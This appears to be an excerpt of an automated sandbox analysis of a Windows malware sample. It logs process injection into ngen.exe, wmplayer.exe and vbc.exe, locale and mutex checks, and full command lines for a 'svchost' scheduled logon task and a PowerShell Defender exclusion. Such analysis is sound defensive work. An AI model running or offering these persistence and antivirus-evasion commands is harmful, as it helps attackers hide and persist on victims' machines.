              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 475000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 476000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 47B000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 4E00008Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 456000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 46E000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 474000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 475000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 476000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 47B000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 2C32008
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 456000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 46E000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 474000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 475000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 476000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 47B000
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 48DA008
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe13_2_00410B5C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe19_2_00410B5C
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe29_2_00410B5C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004175E1 mouse_event,13_2_004175E1
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD64D.tmp.bat""Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"Jump to behavior
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 464 -p 7964 -ip 7964
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7964 -s 1196
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 8048 -ip 8048
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8048 -s 1176
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 552 -p 8048 -ip 8048
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8048 -s 1176
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 1072 -ip 1072
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1072 -s 1424
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 7964 -ip 7964
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7964 -s 1196
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 516 -p 7920 -ip 7920
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7920 -s 1128
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004329DA cpuid 13_2_004329DA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: EnumSystemLocalesW,13_2_0044F17B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: EnumSystemLocalesW,13_2_0044F130
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: EnumSystemLocalesW,13_2_0044F216
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_0044F2A3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoA,13_2_0040E2BB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoW,13_2_0044F4F3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_0044F61C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoW,13_2_0044F723
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_0044F7F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: EnumSystemLocalesW,13_2_00445914
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoW,13_2_00445E1C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,13_2_0044EEB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: EnumSystemLocalesW,19_2_0044F17B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: EnumSystemLocalesW,19_2_0044F130
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: EnumSystemLocalesW,19_2_0044F216
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_0044F2A3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoA,19_2_0040E2BB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoW,19_2_0044F4F3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_0044F61C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoW,19_2_0044F723
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_0044F7F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: EnumSystemLocalesW,19_2_00445914
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoW,19_2_00445E1C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_0044EEB8
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: EnumSystemLocalesW,29_2_0044F17B
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: EnumSystemLocalesW,29_2_0044F130
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: EnumSystemLocalesW,29_2_0044F216
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,29_2_0044F2A3
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoA,29_2_0040E2BB
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoW,29_2_0044F4F3
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,29_2_0044F61C
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoW,29_2_0044F723
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,29_2_0044F7F0
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: EnumSystemLocalesW,29_2_00445914
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoW,29_2_00445E1C
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,29_2_0044EEB8
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeQueries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_136.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
